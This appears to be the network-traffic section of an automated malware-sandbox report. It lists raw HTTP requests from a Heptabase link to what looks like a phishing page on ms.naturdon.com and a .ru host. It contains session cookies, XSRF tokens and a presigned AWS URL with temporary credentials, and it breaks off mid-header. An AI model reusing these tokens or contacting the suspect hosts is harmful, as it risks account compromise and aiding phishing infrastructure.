              Source: global trafficHTTP traffic detected: GET /v1/getDownloadUrlFromWhiteboard HTTP/1.1Host: api.heptabase.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; AWSALB=HIf7Oab2HGeOilDt9laIejtdkbtNyIKms/MGPOyL5s84mLPWB5Ui+bRqHWmw+3Z8o01ETRmarkUq/js+zr3rpG/BkRl6AacR1vz29QaqLNygew212ceRGwgQ/h8Z; AWSALBCORS=HIf7Oab2HGeOilDt9laIejtdkbtNyIKms/MGPOyL5s84mLPWB5Ui+bRqHWmw+3Z8o01ETRmarkUq/js+zr3rpG/BkRl6AacR1vz29QaqLNygew212ceRGwgQ/h8Z
              Source: global trafficHTTP traffic detected: GET /next-integrations/actions/845/449cd4534726259c2a8c.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /7bc20933-395c-4bea-b8ef-657e689f4461/48bc7a27-a1fe-4a9f-9e5d-ce6f93a1c46e?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAWG7ACJC2SIPZZMG7%2F20250324%2Fus-west-1%2Fs3%2Faws4_request&X-Amz-Date=20250324T172449Z&X-Amz-Expires=604800&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMSJGMEQCIEO%2BbMaHNavUkZVL26kWD5F%2FBAJUS205oohrwUh5hVBMAiARmu6txal9o9uqt2N2n9NM9GzSpvHEq8dZbFXGNhcRjyryAwjw%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDQyNzI4MjI4Njc3MyIMdOcZLTQ0mY9%2BVGv3KsYD0L4%2FVEJbT1iSzVKAONiynZbz2Cx6ewv77y62wtPMnaUwpBurSmgHV%2BjnZ0nyOINxwqwahRGmqKTTfkezWF0jzaJt%2FIOU2cvuCsySsHTPKXFfl5ERR9MkNAbbQlNgLnAbAiXlfr84VmFVm6%2B444P6xKpBoxz3R93JpjULRsmldYny2EZ08QCp2k6cBvUsW%2F26GqFv9%2Fp0ZuQPn6hOmyUAp%2BovKAejmiAv1xQI9DQgqnoW8CYP6rvt2oljcE4jipfyWfW3ZcnNHBsAnOXcoUnbkhtGrCdUWTAFRecgGjsVIv8Mc%2FL9XzRxEUFbhj9I0joWoWPe7aWFl6Zh2Pk1xmY1Ax5dt8%2BRv23%2BfByZAAJef2Tiqx%2Fd8IkK25RIV0fkEa7YVRBbdz3fuYcrmvA0ki5yvAj94O2q31ngxNT37hYuXL3C38n4AYY1YCmiVTfA93hEEGUQ806qdV7FjjS%2FY1CPyBHMlJdrf9UzZCcORwNsFKR1ZjmsnXHu1KpbW3aiIZ7vJqzS13QboQDW9tsCyw2mrw5qscHHTs8ywY4ZILhQ4WxCSpjdGyFTDWlTN77V01fdSY2AxoCan8s29%2B%2BfzUNxdxBripdXEjDG1oW%2FBjqmAQyeVeGypuI4%2Feiw%2B05IS1YrRbpTydqenB0rYAaH6oeGSu%2FjoRjoxA51daygu2vsTsdzp2zctc8%2FobSZmO3FRUgXz3A0UvBxeXKxswy%2F0JR%2FaxaMBFKLhOsok21o7qJbaCuBUMf2xf4jW3F0OgvOeyFxqytKyTYFJsIqpU3m9Ny7S%2FDJT3p55JKEjkYzNAeMkIDFOoQ9WyfQgCrkQVsWAs2fh94nb%2Fo%3D&X-Amz-Signature=785b00f6cd64c6a3daa5743b936cff76b1875610fac000215493659f07e0d78d&X-Amz-SignedHeaders=host&response-content-type=image%2Fjpeg&x-id=GetObject HTTP/1.1Host: heptabase-hepta-file.s3.us-west-1.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /iVYo/ HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ms.naturdon.com/iVYo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Illramh5ZzVLUFE4MkdpWUswZEVpZ1E9PSIsInZhbHVlIjoiWGZvbnNleUtFU3htajlkeGJ5S0JZNUVMYll1bHNZaTdIc1BtQ3lUTXNJODNFNkxHTzgvNFNibUVwcmdia3krdlJ5MDFMSVMzTkFKNm1HSWIzemxkNTVIYzA4ZUdHMFNySVJMTitoT2ZzaEZiM1E5eGNMbDdKU3dWNXJZYWc3UWIiLCJtYWMiOiJkYjQxMmZkMzBhNmUwY2UyMGFmMDcyZjIwY2E5NDZkOTIxNjBjZGNkZWUxNjQ5ZTk0YzJhMDY4MWU5NDIxOTE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InFMQUFQMDZKVUtEaEUyc0xxYkx5ZlE9PSIsInZhbHVlIjoiY1Y1YjZrUUxzQ1VNRVZNRFROakNRMFQ4L0NmaGFRbm1OeDY3QXVEVGkvbFZYK1FXeVE1bEVXYmYzZDE2czRzMVJkVnEvY29VbmVLZGpzSnEwa0d2WEhpaGNSWGZkNm10Ky9CNlEvMDU4UUQzYU9JcjRuRGZWMUdkMmQ3cUdUdEIiLCJtYWMiOiJlZTJiODQwNjZiNzA1ZWEwNmE5NzZmZjAyNzBmNzU3YjBjMDJlMjQ2ZjZiYWNkYjhkMDI5MTMxNmJkMzEwNTdiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /jawari!ly1jx HTTP/1.1Host: dvw4e.ajcffp.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://ms.naturdon.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jawari!ly1jx HTTP/1.1Host: dvw4e.ajcffp.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /iVYo/ HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ms.naturdon.com/iVYo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxFR2NSV2lNdDVsZ01OWktpeStvTGc9PSIsInZhbHVlIjoiMnBaZnovMnJmNTdzd04yWHEyZzIvamJnRmI2OVN2SDNCNnFCNHdlWWg5alZPMHhmM3ZLTmREbFRORU1DbXJJOVQyNm1KdkZuK3ovZGRVMjlXUzdnT3UxUzdDKzJKaHRBNkxxeVEyRWxTMWpvUXZWcFpuMHgyM0RrUDdMTnN3Y3AiLCJtYWMiOiJhOGFjNWFiNDZjZmQ1N2ZmOWZkN2ViYzJiZGUxOGVlNzMxZTM0NjU0MTI2Y2IwZTExNmNmNmQ0YjliMDAzYzlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFEZldTLzJUZ3lVMHBsNkExR1BSSVE9PSIsInZhbHVlIjoiTnhIb2ZMWkVZSlk2VHA4NGtVd21GbUY1T29rVGk2alVGSm4zdEdHSlN4S3BoQmtrVTJkMjVrUE5OVlFqNUlyK0ROZktsRWgxUGtJR1R1bmJkL0llVTBxS0ozb2R5aGo4bFV1VzVvcVpWOThZTkp4azlPaFRoRFcrbFhkNCttOTciLCJtYWMiOiJmMTE5YjhhOWU2ZTk3NmNjOGQ0YTg1ZjVlMGI2YTJhYzBjOTE2NmI4MzIwZTFkOWJmZGQxNTI4ZDllNGE3OTI0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /vbHRpjZ0vryIuysQnLKkYLyik8e09PeI7m HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxFR2NSV2lNdDVsZ01OWktpeStvTGc9PSIsInZhbHVlIjoiMnBaZnovMnJmNTdzd04yWHEyZzIvamJnRmI2OVN2SDNCNnFCNHdlWWg5alZPMHhmM3ZLTmREbFRORU1DbXJJOVQyNm1KdkZuK3ovZGRVMjlXUzdnT3UxUzdDKzJKaHRBNkxxeVEyRWxTMWpvUXZWcFpuMHgyM0RrUDdMTnN3Y3AiLCJtYWMiOiJhOGFjNWFiNDZjZmQ1N2ZmOWZkN2ViYzJiZGUxOGVlNzMxZTM0NjU0MTI2Y2IwZTExNmNmNmQ0YjliMDAzYzlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFEZldTLzJUZ3lVMHBsNkExR1BSSVE9PSIsInZhbHVlIjoiTnhIb2ZMWkVZSlk2VHA4NGtVd21GbUY1T29rVGk2alVGSm4zdEdHSlN4S3BoQmtrVTJkMjVrUE5OVlFqNUlyK0ROZktsRWgxUGtJR1R1bmJkL0llVTBxS0ozb2R5aGo4bFV1VzVvcVpWOThZTkp4azlPaFRoRFcrbFhkNCttOTciLCJtYWMiOiJmMTE5YjhhOWU2ZTk3NmNjOGQ0YTg1ZjVlMGI2YTJhYzBjOTE2NmI4MzIwZTFkOWJmZGQxNTI4ZDllNGE3OTI0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ms.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rqS5DHMtUFf3KT9q8ukN4yHulJtYoxvAk1NDcbB3pNrzjy HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZ5ajQwSkN0aXoyckYxdy81Y2ErNEE9PSIsInZhbHVlIjoiajgzd213Q0p6MjBKMVNTbXJJK2VaVnR1QTdKenYrbGl0U3VQRTVrdVlvZk1zM2ZmdjFMZ3ZGWkVjSThWQmlwWHlOMTJ6elhNRDF2SklCMHpsTGM4S0JGOWtIZkxrb1VZYXVJcjJYMnJCZTNVbUlwUSt0YndYcG5iMHNoeVpjZ0siLCJtYWMiOiJkMWIxMmE0ZTc0NjQzNDJlNGJlMTk0OGVkNzBjYzM5MTQ4OGRlOWY2M2U1YzU0NGQxMTc1OTE5NDMyNWJkZTdiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBjeTlPUkpvWlpPelN6QStHWDIwOUE9PSIsInZhbHVlIjoiVHRLU0hsb3Bxd3EvOEp4TTBMMlFDMmhrcEtEcVZQRHpjclBQRG9aM3RIaDFYZFRpMFRtb1hZbThSOWczVE9uS3BKL1IzNi9BeVczRnhsQTJiVWtiNVVuTlBwREdia1FHcHg4RFEyemFRYkVlbmtLcElnWWNRNmFhQ3NXanVyK3giLCJtYWMiOiI4MTU5ZDU4OGU1MTAzOTFmOTEwMTUxMWRhZTU4NGYwNGZkNWVlN2VmYmRmN2RjMGMyOWZkZTJkMDk1ZjU4ZTdjIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNR HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ms.naturdon.com/iVYo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZ5ajQwSkN0aXoyckYxdy81Y2ErNEE9PSIsInZhbHVlIjoiajgzd213Q0p6MjBKMVNTbXJJK2VaVnR1QTdKenYrbGl0U3VQRTVrdVlvZk1zM2ZmdjFMZ3ZGWkVjSThWQmlwWHlOMTJ6elhNRDF2SklCMHpsTGM4S0JGOWtIZkxrb1VZYXVJcjJYMnJCZTNVbUlwUSt0YndYcG5iMHNoeVpjZ0siLCJtYWMiOiJkMWIxMmE0ZTc0NjQzNDJlNGJlMTk0OGVkNzBjYzM5MTQ4OGRlOWY2M2U1YzU0NGQxMTc1OTE5NDMyNWJkZTdiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBjeTlPUkpvWlpPelN6QStHWDIwOUE9PSIsInZhbHVlIjoiVHRLU0hsb3Bxd3EvOEp4TTBMMlFDMmhrcEtEcVZQRHpjclBQRG9aM3RIaDFYZFRpMFRtb1hZbThSOWczVE9uS3BKL1IzNi9BeVczRnhsQTJiVWtiNVVuTlBwREdia1FHcHg4RFEyemFRYkVlbmtLcElnWWNRNmFhQ3NXanVyK3giLCJtYWMiOiI4MTU5ZDU4OGU1MTAzOTFmOTEwMTUxMWRhZTU4NGYwNGZkNWVlN2VmYmRmN2RjMGMyOWZkZTJkMDk1ZjU4ZTdjIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /56m71bBBEdPnDabIvGt3p8916 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /xynACghvrsuVjigh30 HTTP/1.1Host: ms.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveOrigin: https://ms.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveOrigin: https://ms.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikx2bElDM0U1OEcvMDJNSkFTZHBDQ3c9PSIsInZhbHVlIjoibGhpa1Y1bkU1Vnk0U1h3NGxrc0xyN2I2NUNzNm1OVzFoQnZJcHRmWEhKbEYyVmlzaGhjWlFDZjhpb3YrQ0lkY1A4UGx3YmVsdzNjcmZtM2tLMnhnSHdyUTRndFYwemFYZCtSaENCRW5FN0ZwdktiWXNRekZWVXVxcnA4L3NMR1QiLCJtYWMiOiI1Yzg4NzY5MDhlOTRjOTY2OWUxYmUyOWY2NTg5ZjQxMzljZTFjNjFjMTc4ZTE3NzQzMGUxMzM4ZGI4N2Q5YzNhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveOrigin: https://ms.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZaMFVHbmdGWS9kVmt6UU9PZnVwK3c9PSIsInZhbHVlIjoicndrdjZ3WDJnVzJqVHh6WFNKRjJHeXl2S2pJUU5uYUlpRG5CV0NUa1IzNlVRYUUvL2VrWWZrWkZQbVZiUGxjMVFjdkoybGt2bklDRVJnVTlXOWlFSGN6c1lKbnJxVUVPbjByWjlqUEJmSnppcG5LK3gzK3pJcFc2SERoWFhIOC8iLCJtYWMiOiJiYzA2YTNmYmZmZWU1MDRlY2M5NzIzNmM4ZDVhZDYxODRmNDU1ODQzMGNhMzQzYTM3YjM2MjUxYzA4OGNkNjk2IiwidGFnIjoiIn0%3D; 